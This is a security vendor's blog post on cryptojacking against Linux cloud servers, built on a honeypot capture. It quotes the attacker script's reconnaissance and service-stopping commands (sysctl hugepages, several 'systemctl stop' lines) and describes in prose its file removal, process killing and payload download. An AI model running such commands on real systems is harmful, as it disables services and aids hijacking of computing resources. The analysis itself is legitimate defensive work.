Defending Linux-Based Clouds from Cryptojacking

Want to see Spyderbat in action?
Request a Demo Try Free Tier (Forever Free)

2021 saw a marked rise – 35% – in malware targeting Linux systems. To anyone familiar with recent trends in business cloud migration, this should come as no surprise. 

Between 2017 and 2021, the global cloud storage market more than doubled from $30 billion to $76 billion and is projected to balloon to $390 billion by 2028. By the end of 2021, 94% of enterprises were running workloads in the cloud. For malware designers, the explosion of cloud use and remote access points has opened a lucrative window of opportunity.

90% of clouds run on Linux, but the cybersecurity industry remains focused on handling Windows-based threats. In the meantime, attackers – cryptominers in particular – are taking advantage of this expanding and largely undefended attack surface to skim quick cash off the unprepared. Already Palo Alto Networks has found Linux-based cryptojacking operations on 23% of business cloud infrastructures.

 

Cryptominers and Linux

Spyderbat Runtime Security

Cryptojacking 1

This screenshot from Spyderbat presents a real cryptojacking attack captured from one of our honeypots. This is a patched Linux cloud droplet with only the SSH service exposed with a weak user password. It was popped within minutes.

Using Spyderbat, we can see exactly what the attacker does and the outcomes from the script executed:

1. After logging in, the cryptojacker downloads a script and makes it executable, then executes the script.

2. The first stage of the script is to run a series of commands to learn about the system and disable running services, such as:

/bin/grep -c processor /proc/cpuinfo

/sbin/sysctl -w vm.nr_hugepages=3

/usr/bin/systemctl stop filesystem.service

/usr/bin/systemctl stop fbackup.service

/bin/systemctl stop vsphereui.service

/usr/bin/systemctl stop vsphere.service

Cryptojacking 2

3. The next stage of the script removes files (such as service configuration files, libexec executables, and identifies and stops a long list of running processes.

Cryptojacking 3

4. The last stage of the script downloads several executables, libraries, and json content, and reloads itself as a service. 

Experience Spyderbat in real-world scenarios by viewing our Defend the Flag challenges.

Want to see Spyderbat in action?
Request a Demo Try Free Tier (Forever Free)
Previous Enhanced Runtime Monitoring to Detect and Deter Supply Chain Attacks
Runtime Security at the Speed of Development Next